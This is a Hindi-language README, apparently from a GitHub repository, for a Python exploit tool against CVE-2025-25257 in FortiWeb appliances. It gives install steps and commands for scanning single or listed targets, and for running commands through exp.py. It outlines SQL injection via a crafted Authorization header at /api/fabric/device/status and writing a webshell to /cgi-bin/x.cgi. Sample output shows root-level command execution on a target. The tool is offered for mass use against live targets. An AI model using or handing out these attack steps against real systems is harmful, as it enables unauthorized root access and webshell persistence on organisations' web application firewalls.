
FortiWeb में CVE-2025-25257 के लिए Python-आधारित शोषण उपकरण। संवेदनशील लक्ष्यों पर SQL इंजेक्शन का पता लगाने, वेबशेल अपलोड और दूरस्थ कमांड निष्पादन को स्वचालित करता है।
FortiWeb उपकरणों में CVE-2025-25257 भेद्यता की जाँच और शोषण के लिए एक Python-आधारित उपकरण। यह भेद्यता एक निर्मित प्राधिकरण हेडर के माध्यम से SQL इंजेक्शन और दूरस्थ कोड निष्पादन की अनुमति देती है।
CVE-2025-25257 FortiWeb उपकरणों में एक गंभीर भेद्यता है जो अनुमति देती है:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)एकल लक्ष्य की जाँच करें:
python3 vuln_check.py -t https://target.com
फ़ाइल से कई लक्ष्यों की जाँच करें:
python3 vuln_check.py -l target.txt
exp.py)एक असुरक्षित लक्ष्य पर कमांड निष्पादित करें:
python3 exp.py -t https://target.com -c "id"
vuln_check.py - मुख्य भेद्यता जाँचकर्ता और शोषणexp.py - असुरक्षित लक्ष्यों के लिए कमांड निष्पादन उपकरणtarget.txt - लक्ष्यों की नमूना सूची (अपनी खुद की सूची से बदलें)vuln.txt - असुरक्षित लक्ष्यों वाली आउटपुट फ़ाइल (स्कैन के बाद उत्पन्न)/api/fabric/device/status का शोषण करता है/cgi-bin/x.cgi पर वेबशेल लिखने के लिए SQL इंजेक्शन का उपयोग करता हैउपकरण एक vuln.txt फ़ाइल उत्पन्न करता है जिसमें शामिल है:
उदाहरण आउटपुट:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
श्रेय:0xbigshaq